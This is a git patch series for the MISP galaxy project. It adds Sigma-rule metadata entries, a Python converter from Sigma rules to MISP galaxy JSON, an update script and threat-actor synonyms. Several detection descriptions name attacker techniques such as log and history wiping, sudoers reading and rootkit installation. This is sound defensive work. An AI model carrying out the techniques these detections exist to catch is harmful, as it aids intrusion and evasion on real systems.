"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", + "value": "Curl Usage on Linux" + }, + { + "description": "Detects enumeration of local or remote network services.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_network_service_scanning.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31", + "value": "Linux Network Service Scanning" + }, + { + "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_services_stop_and_disable.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", + "value": "Disable Or Stop Services" + }, + { + "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", + "meta": { + "author": "Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Log rotation." + ], + "filename": "proc_creation_lnx_clear_syslog.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ] + }, + "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", + "value": "Commands to Clear or Remove the Syslog" + }, + { + "description": "Detects java process spawning suspicious children", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_susp_java_children.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.tecmint.com/different-types-of-linux-shells/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892", + "value": "Suspicious Java Children Processes" + }, + { + "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_process_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ] + }, + "uuid": "4e2f5868-08d4-413d-899f-dc2f1508627b", + "value": "Process Discovery" + }, + { + "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Administrator interacting with immutable files (e.g. for instance backups)." + ], + "filename": "proc_creation_lnx_chattr_immutable_removal.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12", + "value": "Remove Immutable File Attribute" + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." + ], + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ] + }, + "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a", + "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand" + }, + { + "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/06", + "falsepositive": [ + "Administrators or installed processes that leverage nohup" + ], + "filename": "proc_creation_lnx_nohup.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://gtfobins.github.io/gtfobins/nohup/", + "https://www.computerhope.com/unix/unohup.htm", + "https://en.wikipedia.org/wiki/Nohup", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" + ], + "tags": "No established tags" + }, + "uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", + "value": "Nohup Execution" + }, + { + "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/05", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_install_root_certificate.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "78a80655-a51e-4669-bc6b-e9d206a462ee", + "value": "Install Root Certificate" + }, + { + "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_crontab_removal.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", + "value": "Remove Scheduled Cron Task/Job" + }, + { + "description": "Detects setting proxy configuration", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/17", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_proxy_connection.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1090/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1090" + ] + }, + "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", + "value": "Connection Proxy" + }, + { + "description": "Detects known hacktool execution based on image name", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_hack_tools.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "a015e032-146d-4717-8944-7a1884122111", + "value": "HackTool Execution" + }, + { + "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_file_deletion.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", + "value": "File Deletion" + }, + { + "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.", + "meta": { + "author": "Sittikorn S, Teoderick Contreras", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_doas_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://research.splunk.com/endpoint/linux_doas_tool_execution/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "067d8238-7127-451c-a9ec-fa78045b618b", + "value": "Linux Doas Tool Execution" + }, + { + "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_susp_history_delete.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565.001" + ] + }, + "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f", + "value": "History File Deletion" + }, + { + "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_cat_sudoers.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004" + ] + }, + "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", + "value": "Cat Sudoers" + }, + { + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_susp_git_clone.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1593.003" + ] + }, + "uuid": "cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", + "value": "Suspicious Git Clone - Linux" + }, + { + "description": "Detects suspicious change of file privileges with chown and chmod commands", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/16", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_setgid_setuid.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", + "https://attack.mitre.org/techniques/T1548/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", + "value": "Setuid and Setgid" + }, + { + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.33891" + ] + }, + "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", + "value": "Apache Spark Shell Command Injection - ProcessCreation" + }, + { + "description": "Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_local_groups.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "676381a6-15ca-4d73-a9c8-6a22e970b90d", + "value": "Local Groups Discovery - Linux" + }, + { + "description": "Detects usage of the \"usermod\" binary to add users add users to the root or suoders groups", + "meta": { + "author": "TuanLe (GTSC)", + "creation_date": "2022/12/21", + "falsepositive": [ + "Legitimate administrator activities" + ], + "filename": "proc_creation_lnx_usermod_susp_group.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", + "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence" + ] + }, + "uuid": "6a50f16c-3b7b-42d1-b081-0fdd3ba70a73", + "value": "User Added To Root/Sudoers Group Using Usermod" + }, + { + "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1014" + ] + }, + "uuid": "22236d75-d5a0-4287-bf06-c93b1770860f", + "value": "Triple Cross eBPF Rootkit Install Commands" + }, + { + "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_security_software_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", + "value": "Security Software Discovery - Linux" } ], "version": 1 From 1c8880b3bbc516f0c13733f283f42a56c2677556 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Fri, 6 Jan 2023 16:00:37 +0100 Subject: [PATCH 07/13] new: [tools] Sigma export tool added based on https://github.com/jstnk9/MISP/pull/1 --- tools/sigma/sigma-to-galaxy.py | 219 +++++++++++++++++++++++++++++++++ tools/sigma/update.sh | 5 + 2 files changed, 224 insertions(+) create mode 100644 tools/sigma/sigma-to-galaxy.py create mode 100644 tools/sigma/update.sh diff --git a/tools/sigma/sigma-to-galaxy.py b/tools/sigma/sigma-to-galaxy.py new file mode 100644 index 0000000..cde7a57 --- /dev/null +++ b/tools/sigma/sigma-to-galaxy.py @@ -0,0 +1,219 @@ +""" + + Author: Jose Luis Sanchez Martinez + Twitter: @Joseliyo_Jstnk + date: 2022/11/18 + Modified: 2022/12/05 + GitHub: https://github.com/jstnk9/MISP + Description: This script can create MISP Galaxies from Sigma Rules. It can be done setting the path + where you have stored your sigma rules in the system. + Examples: python sigma-to-galaxy -p "C:\lab\sigma\rules\" -r + MISP Galaxy: https://github.com/MISP/misp-galaxy + +""" + +import os, json, yaml, argparse, uuid + +unique_uuid = '9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2' + + +def main(args): + uuidGalaxy = create_galaxy_json() + galaxyCluster = create_cluster(uuidGalaxy=unique_uuid) + valuesData = create_cluster_value(args.inputPath, args.recursive, galaxyCluster) + galaxyCluster["values"].extend(valuesData) + create_cluster_json(galaxyCluster) + check_duplicates(galaxyCluster) + + +def check_duplicates(galaxy): + """ + :param galaxy: Content of the cluster with all the values + + :return res: + """ + galaxiesObj = {} + for val in galaxy["values"]: + obj = {} + if galaxiesObj.get(val["value"]): + galaxiesObj[val["value"]].append(val["uuid"]) + else: + galaxiesObj[val["value"]] = [] + galaxiesObj[val["value"]].append(val["uuid"]) + + for k, v in galaxiesObj.items(): + if len(v) > 1: + print("[*] Title duplicated: %s " % (k)) + for ids in v: + print(" %s" % (ids)) + + +def create_cluster_json(galaxyCluster): + """ + :param galaxyCluster: Content of the cluster with all the values related to the Sigma Rules + + This function finally creates the sigma-cluster.json file with all the information. + """ + with open("sigma-cluster.json", "w") as f: + json.dump(galaxyCluster, f) + + +def parseYaml(inputPath, yamlFile): + """ + :param inputPath: Path where is stored the Sigma Rule to parse. + :param yamlFile: Content of the Sigma Rule. + + This function can convert a Sigma Rule to JSON (dict) + + :return jsonData: Sigma rule converted to dict. + """ + fullPath = os.path.join(inputPath, yamlFile) + with open(fullPath, encoding='utf-8') as f: + jsonData = yaml.load(f, Loader=yaml.FullLoader) + return jsonData + + +def create_cluster(uuidGalaxy=unique_uuid): + """ + :param uuidGalaxy: Is the uuid4 generated for the galaxy JSON file previously. + + This function creates the JSON file of the path /app/files/misp-galaxy/clusters without values. + + :return cluster: Dict with the basic information needed for the JSON file. + """ + cluster = { + "authors": ["@Joseliyo_Jstnk"], + "category": "rules", + "description": "MISP galaxy cluster based on Sigma Rules.", + "name": "Sigma-Rules", + "source": "https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma", + "type": "sigma-rules", + "uuid": uuidGalaxy, + "values": [], + "version": 1, + } + + return cluster + + +def create_cluster_value(pathsigma, recursive, galaxyCluster): + """ + :param pathsigma: Is the path established with the -p parameter + :param recurisve: If true, it can recursively navigate through every subfolder of :pathsigma: + :param galaxyCluster: Dictionary with the information needed for the cluster JSON file + + This function makes a loop in every subfolder to identify Sigma Rules and after that.. + 1. It parse the YAML file to dict + 2. Once it's a dict, it call the function to parse the dict and start creating the + values of the cluster + + IMPORTANT: Sigma rules must ends with .yml and not .yaml + + :return valuesData: Array with every Sigma Rule parsed into a dict. + """ + valuesData = [] + if recursive == True: + for dirpath, dirs, files in os.walk(pathsigma): + if os.name == 'nt': + path = dirpath.split('/')[0] + else: + path = dirpath + + for f in files: + if f.endswith(".yml"): + jsonData = parseYaml(path, f) + valuesData.append( + parse_sigma_to_cluster(jsonData, f, path.split("rules")[1]) + ) + + return valuesData + + +def parse_sigma_to_cluster(jsonData, sigmaFile, sigmaPath): + """ + :param jsonData: Is the Sigma Rule parsed to dict. + :param sigmaFile: Is the Sigma Rule filename. + :param sigmaPath: Is the path where are stored the Sigma Rules. + + This function parse the dict of the Sigma Rule to fill all the fields needed for the MISP Galaxy. + + :return valueData: Dict with all the fields filled ready to be added in the cluster JSON file. + + """ + valueData = {} + valueData["description"] = jsonData.get("description", "No established description") + valueData["uuid"] = jsonData.get("id", "No established id") + valueData["value"] = jsonData.get("title", "No established title") + valueData["meta"] = {} + valueData["meta"]["refs"] = [] + if jsonData.get("references"): + for rf in jsonData.get("references"): + valueData["meta"]["refs"].append(rf) + valueData["meta"]["refs"] = [ + *set(valueData["meta"]["refs"]) + ] # Removing duplicated references + valueData["meta"]["tags"] = jsonData.get("tags", "No established tags") + valueData["meta"]["creation_date"] = jsonData.get("date", "No established date") + valueData["meta"]["filename"] = sigmaFile + valueData["meta"]["author"] = jsonData.get("author", "No established author") + valueData["meta"]["level"] = jsonData.get("level", "No established level") + valueData["meta"]["falsepositive"] = jsonData.get( + "falsepositives", "No established falsepositives" + ) + valueData["meta"]["refs"].append( + "https://github.com/SigmaHQ/sigma/tree/master/rules%s/%s" + % (sigmaPath.replace("\\", "/"), sigmaFile) + ) # this value only works if you set the path like it was cloned from github + valueData["meta"]["logsource.category"] = jsonData.get("logsource").get( + "category", "No established category" + ) + valueData["meta"]["logsource.product"] = jsonData.get("logsource").get( + "product", "No established product" + ) + return valueData + + +def create_galaxy_json(): + """ + This method creates first the galaxy JSON stored in the path /app/files/misp-galaxy/galaxies + The information of this JSON is basic. + + :return uuidGalaxy: Return the uuid needed for the cluster JSON File which is created after this. + """ + uuidGalaxy = unique_uuid + galaxy = { + "description": "Sigma Rules are used to detect suspicious behaviors related to threat actors, malware and tools", + "icon": "link", + "name": "Sigma-Rules", + "namespace": "misp", + "type": "sigma-rules", + "uuid": uuidGalaxy, + "version": 1, + } + with open("sigma-rules.json", "w") as f: + json.dump(galaxy, f) + + return uuidGalaxy + + +if __name__ == '__main__': + parser = argparse.ArgumentParser( + description="This script can convert your sigma rules in MISP galaxies, generating both files needed for cluster and galaxies. If you need more information about how to import it, please, go to https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma" + ) + parser.add_argument( + "-p", + "--path", + dest="inputPath", + required=True, + default="None", + help="Path with your sigma rules.", + ) + parser.add_argument( + "-r", + "--recursive", + dest="recursive", + action="store_true", + help="If you have subfolders on the initial path and you want to convert all of them, use -r to do it recursive.", + ) + args = parser.parse_args() + main(args) diff --git a/tools/sigma/update.sh b/tools/sigma/update.sh new file mode 100644 index 0000000..cbda0de --- /dev/null +++ b/tools/sigma/update.sh @@ -0,0 +1,5 @@ +#!/bin/bash +rm -rf sigma +git clone https://github.com/SigmaHQ/sigma +python3 sigma-to-galaxy.py -r -p ./sigma/rules +cat sigma-cluster.json | jq -S . >../../clusters/sigma-rules.json From e54366fb8736484066698536ba4084358c9449c5 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Tue, 10 Jan 2023 15:55:30 +0100 Subject: [PATCH 08/13] chg: [threat-actor] added the missing synonyms --- clusters/threat-actor.json | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 2c01817..972a6b9 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -8677,7 +8677,13 @@ "meta": { "refs": [ "https://www.rewterz.com/rewterz-news/rewterz-threat-alert-common-raven-iocs", - "https://www2.swift.com/isac/report/10118" + "https://www2.swift.com/isac/report/10118", + "https://blog.group-ib.com/opera1er-apt" + ], + "synonyms": [ + "OPERA1ER", + "NXSMS", + "DESKTOP-GROUP" ] }, "uuid": "da581c60-7c3d-4de6-b54c-cafea1c58389", @@ -9986,5 +9992,5 @@ "value": "Malteiro" } ], - "version": 256 + "version": 257 } From c0fdfb0e997cef645507b9c8239395ed5b47e41d Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Thu, 12 Jan 2023 13:46:31 +0100 Subject: [PATCH 09/13] chg: [sigma] updated with latest version + new relationship script --- clusters/sigma-rules.json | 22614 ++++++++++++++++++++++++++++++++---- 1 file changed, 20669 insertions(+), 1945 deletions(-) diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json index ffc3f22..9954344 100644 --- a/clusters/sigma-rules.json +++ b/clusters/sigma-rules.json @@ -9,6 +9,37 @@ "type": "sigma-rules", "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", "values": [ + { + "description": "Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.", + "meta": { + "author": "Tim Brown", + "creation_date": "2023/01/09", + "falsepositive": [ + "Unlikely. Except due to misconfigurations" + ], + "filename": "juniper_bgp_missing_md5.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "juniper", + "refs": [ + "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/juniper/bgp/juniper_bgp_missing_md5.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.credential_access", + "attack.collection", + "attack.t1078", + "attack.t1110", + "attack.t1557" + ] + }, + "uuid": "a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43", + "value": "Juniper BGP Missing MD5" + }, { "description": "Detects many failed connection attempts to different ports or hosts", "meta": { @@ -55,6 +86,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "51186749-7415-46be-90e5-6914865c825a", "value": "High DNS Requests Rate - Firewall" }, @@ -102,6 +149,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3b6e327d-8649-4102-993f-d25786481589", "value": "High DNS Bytes Out - Firewall" }, @@ -118,8 +174,8 @@ "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml" ], @@ -141,8 +197,8 @@ "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", + "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", 